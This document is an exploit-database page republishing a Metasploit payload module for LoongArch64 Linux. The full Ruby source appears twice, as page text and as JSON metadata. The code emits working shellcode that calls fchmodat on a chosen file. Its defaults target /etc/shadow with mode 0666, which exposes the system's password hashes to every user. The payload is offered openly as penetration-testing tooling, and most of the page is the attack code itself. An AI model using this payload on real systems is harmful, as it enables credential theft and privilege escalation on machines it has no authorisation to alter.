Linux Chmod_MSF:PAYLOAD-LINUX-LOONGARCH64-CHMOD-

Description

Runs chmod on the specified file with specified mode. Module Options msf use payload/linux/loongarch64/chmod msf payloadchmod show actions ...actions... msf payloadchmod set ACTION msf payloadchmod show options ...show and set options... msf...

Visit Original Source

Basic Information

ID MSF:PAYLOAD-LINUX-LOONGARCH64-CHMOD-

Published Apr 16, 2026 at 19:02

Affected Product

Affected Versions # frozen_string_literal: true

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
CachedSize = 48

include Msf::Payload::Single
include Msf::Payload::Linux

def initialize(info = {})
super(
merge_info(
info,
'Name' => 'Linux Chmod',
'Description' => 'Runs chmod on the specified file with specified mode.',
'Author' => 'bcoles',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_LOONGARCH64,
'References' => [
['URL', 'https://man7.org/linux/man-pages/man2/fchmodat.2.html'],
['URL', 'https://github.com/bcoles/shellcode/blob/main/loongarch64/chmod/chmod.s'],
]
)
)
register_options([
OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),
OptString.new('MODE', [ true, 'File mode (octal)', '0666' ], regex: /\A[0-7]+\z/),
])
end

# @return [String] the full path of the file to be modified
def chmod_file_path
datastore['FILE'] || ''
end

# @return [Integer] the desired mode for the file
def mode
(datastore['MODE'] || '0666').oct
end

# @return [Integer] LoongArch64 instruction to load mode into $a2 register
# Uses ori $a2, $zero, <mode> instruction encoding
# For example: 0x0386d806 ; ori $a2, $zero, 0x1b6 ; loads 0o666 into $a2
def chmod_instruction(mode)
0x03800006 | ((mode & 0xfff) << 10)
end

def generate(_opts = {})
raise ArgumentError, "chmod mode (#{mode}) is greater than maximum mode size (0xFFF)" if mode > 0xFFF

shellcode = [
0x02fe7004, # addi.d $a0, $zero, -100 # AT_FDCWD
0x18000105, # pcaddi $a1, 8 # pointer to path
chmod_instruction(mode), # ori $a2, $zero, <mode>
0x03800007, # ori $a3, $zero, 0 # flags
0x0380d40b, # ori $a7, $zero, 53 # __NR_fchmodat
0x002b0101, # syscall 0x101
0x03800004, # ori $a0, $zero, 0 # exit code
0x0381740b, # ori $a7, $zero, 93 # __NR_exit
0x002b0101, # syscall 0x101
].pack('V*')
shellcode += chmod_file_path + "\x00".b

# align our shellcode to 4 bytes
shellcode += "\x00".b while shellcode.bytesize % 4 != 0

super.to_s + shellcode
end
end

{
    "lastseen": "2026-04-16T19:28:02",
    "description": "Runs chmod on the specified file with specified mode. Module Options msf use payload/linux/loongarch64/chmod msf payloadchmod show actions ...actions... msf payloadchmod set ACTION msf payloadchmod show options ...show and set options... msf...",
    "published": "2026-04-16T19:02:29",
    "modified": "2026-04-16T19:02:29",
    "type": "metasploit",
    "title": "Linux Chmod",
    "source": "",
    "references": "",
    "id": "MSF:PAYLOAD-LINUX-LOONGARCH64-CHMOD-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# frozen_string_literal: true\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nmodule MetasploitModule\n  CachedSize = 48\n\n  include Msf::Payload::Single\n  include Msf::Payload::Linux\n\n  def initialize(info = {})\n    super(\n      merge_info(\n        info,\n        'Name' => 'Linux Chmod',\n        'Description' => 'Runs chmod on the specified file with specified mode.',\n        'Author' => 'bcoles',\n        'License' => MSF_LICENSE,\n        'Platform' => 'linux',\n        'Arch' => ARCH_LOONGARCH64,\n        'References' => [\n          ['URL', 'https://man7.org/linux/man-pages/man2/fchmodat.2.html'],\n          ['URL', 'https://github.com/bcoles/shellcode/blob/main/loongarch64/chmod/chmod.s'],\n        ]\n      )\n    )\n    register_options([\n      OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),\n      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ], regex: /\\A[0-7]+\\z/),\n    ])\n  end\n\n  # @return [String] the full path of the file to be modified\n  def chmod_file_path\n    datastore['FILE'] || ''\n  end\n\n  # @return [Integer] the desired mode for the file\n  def mode\n    (datastore['MODE'] || '0666').oct\n  end\n\n  # @return [Integer] LoongArch64 instruction to load mode into $a2 register\n  # Uses ori $a2, $zero, <mode> instruction encoding\n  # For example: 0x0386d806 ; ori $a2, $zero, 0x1b6 ; loads 0o666 into $a2\n  def chmod_instruction(mode)\n    0x03800006 | ((mode & 0xfff) << 10)\n  end\n\n  def generate(_opts = {})\n    raise ArgumentError, \"chmod mode (#{mode}) is greater than maximum mode size (0xFFF)\" if mode > 0xFFF\n\n    shellcode = [\n      0x02fe7004,  # addi.d $a0, $zero, -100  # AT_FDCWD\n      0x18000105,  # pcaddi $a1, 8            # pointer to path\n      chmod_instruction(mode), # ori $a2, $zero, <mode>\n      0x03800007,  # ori $a3, $zero, 0        # flags\n      0x0380d40b,  # ori $a7, $zero, 53       # __NR_fchmodat\n      0x002b0101,  # syscall 0x101\n      0x03800004,  # ori $a0, $zero, 0        # exit code\n      0x0381740b,  # ori $a7, $zero, 93       # __NR_exit\n      0x002b0101,  # syscall 0x101\n    ].pack('V*')\n    shellcode += chmod_file_path + \"\\x00\".b\n\n    # align our shellcode to 4 bytes\n    shellcode += \"\\x00\".b while shellcode.bytesize % 4 != 0\n\n    super.to_s + shellcode\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/linux/loongarch64/chmod.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/payload/linux/loongarch64/chmod/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply